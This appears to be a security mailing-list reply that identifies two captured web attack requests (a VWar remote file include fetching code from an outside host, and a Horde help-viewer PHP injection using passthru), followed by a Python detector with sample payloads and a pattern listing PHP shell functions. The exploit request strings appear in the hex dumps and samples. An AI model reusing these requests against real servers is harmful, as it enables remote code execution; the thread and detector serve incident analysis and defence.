On 4/16/06, Jamie Riden <[EMAIL PROTECTED]> wrote:
> One of these might be the Horde exploit -
> http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?
>
> cheers,
> Jamie
>
> 02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P
> 0:412(412) ack 1 win 65535
> 0x0000:  4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1  E.....@.q.P.....
> 0x0010:  48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d  H..J...P..U"..*.
> 0x0020:  5018 ffff 3431 0000 4745 5420 6874 7470  P...41..GET.http
> 0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
> 0x0040:  7677 6172 2f69 6e63 6c75 6465 732f 6765  vwar/includes/ge
> 0x0050:  745f 6865 6164 6572 2e70 6870 3f76 7761  t_header.php?vwa
> 0x0060:  725f 726f 6f74 3d68 7474 703a 2f2f 7870  r_root=http://xp
> 0x0070:  6c2e 6e65 746d 6973 7068 6572 6532 2e63  l.netmisphere2.c
> 0x0080:  6f6d 2f43 4d44 2e67 6966 3f26 636d 643d  om/CMD.gif?&cmd=
> 0x0090:  7767 6574 2048 5454 502f 312e 300d 0a48  wget.HTTP/1.0.

This is a VWar vulnerability in the get_header.php file (remote file include vulnerability). More info at http://www.securityfocus.com/bid/17358/info.

> 02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P
> 1205950111:1205950537(426) ack 2648749032 win 65535
> 0x0000:  4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1  E.....@.r.N.....
> 0x0010:  48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8  H..J...PG.V.....
> 0x0020:  5018 ffff 1fd8 0000 4745 5420 6874 7470  P.......GET.http
> 0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
> 0x0040:  7765 626d 6169 6c2f 686f 7264 652f 7365  webmail/horde/se
> 0x0050:  7276 6963 6573 2f68 656c 702f 3f73 686f  rvices/help/?sho
> 0x0060:  773d 6162 6f75 7426 6d6f 6475 6c65 3d3b  w=about&module=;
> 0x0070:  2532 322e 7061 7373 7468 7275 2825 3232  %22.passthru(%22
> 0x0080:  6563 686f 2532 3049 524f 434b 5448 4557  echo%20IROCKTHEW
> 0x0090:  4f52 4c44 2532 3229 3b27 2e20 4854 5450  ORLD%22);'..HTTP
> 0x00a0:  2f31 2e30 0d0a 486f 7374 3a20 3732 2e32  /1.0..Host:.72.2
> 0x00b0:  3332 2e33 302e 3734 0d0a 5265 6665 7265  32.30.74..

This is, as you wrote above, the Horde Help Viewer remote PHP code execution vulnerability. More info at http://www.securityfocus.com/bid/17292.

Unfortunately, exploits are in the wild, and the Horde one is especially bad (knowing that Horde is used a lot).

Cheers,
Bojan
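A defender-side check for the two request patterns identified in this thread, added here as an example and not part of the original post or either advisory: it recovers the HTTP request from `tcpdump -X` hex lines, then flags a query parameter that carries a full URL (the VWar `vwar_root` remote include) and PHP shell-function calls injected into the query string (the Horde `module` injection). The hosts, the `HELLO` marker and the `tcpdump_x` helper that builds the sample dumps are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Offset and hex column of a `tcpdump -X` line; the ASCII column after the double space is ignored.
HEX_LINE = re.compile(r"^\s*0x[0-9a-f]{4}:\s+((?:[0-9a-f]{4} )*[0-9a-f]{2,4})(?:\s{2,}|$)", re.I)
REQUEST_LINE = re.compile(rb"(?:GET|POST|HEAD) (\S+) HTTP/1\.[01]")
# PHP functions that pass a string to a shell, as injected into Horde's `module` parameter above.
PHP_EXEC_CALL = re.compile(r"\b(?:passthru|system|exec|shell_exec|popen)\s*\(", re.I)


def tcpdump_x(payload: bytes) -> list[str]:
    """Render bytes the way `tcpdump -X` prints them (used here only to build sample input)."""
    lines = []
    for off in range(0, len(payload), 16):
        chunk = payload[off:off + 16]
        groups = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        ascii_col = "".join(chr(b) if 32 < b < 127 else "." for b in chunk)
        lines.append(f"0x{off:04x}:  {groups:<39}  {ascii_col}")
    return lines


def payload_from_hexdump(lines: list[str]) -> bytes:
    """Recover the raw bytes from the hex column of a tcpdump -X dump."""
    hex_digits = "".join(m.group(1) for m in map(HEX_LINE.match, lines) if m)
    return bytes.fromhex(hex_digits.replace(" ", ""))


def classify_request(lines: list[str]) -> list[str]:
    """Flag the two patterns from the thread: a URL inside a parameter (RFI) and injected PHP calls."""
    m = REQUEST_LINE.search(payload_from_hexdump(lines))  # searching skips the IP/TCP header bytes
    if not m:
        return []
    query = urlsplit(m.group(1).decode("ascii", "replace")).query
    findings = [f"remote-file-include via {name}"
                for name, value in parse_qsl(query, keep_blank_values=True)
                if re.match(r"(?:https?|ftp)://", value, re.I)]
    if PHP_EXEC_CALL.search(unquote(query)):  # decode %22 etc. before looking for the call
        findings.append("php-code-injection in query string")
    return findings


# Constructed samples modelled on the two requests in the post; every host is a placeholder.
FAKE_HEADERS = bytes(40)  # stands in for the IP and TCP headers that tcpdump -X also prints
SAMPLE_VWAR = tcpdump_x(FAKE_HEADERS + b"GET http://victim.example/vwar/includes/get_header.php"
                        b"?vwar_root=http://evil.example/CMD.gif?&cmd=wget HTTP/1.0\r\n")
SAMPLE_HORDE = tcpdump_x(FAKE_HEADERS + b"GET http://victim.example/webmail/horde/services/help/"
                         b"?show=about&module=;%22.passthru(%22echo%20HELLO%22);'. HTTP/1.0\r\n")
SAMPLE_BENIGN = tcpdump_x(FAKE_HEADERS + b"GET /horde/services/help/?show=about&module=imp HTTP/1.0\r\n")
```

`classify_request(SAMPLE_VWAR)` reports the remote include, `classify_request(SAMPLE_HORDE)` the injected `passthru(` call, and the benign help request produces no finding; real `tcpdump -X` output for the same packets would be parsed the same way, since only the hex column is read.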
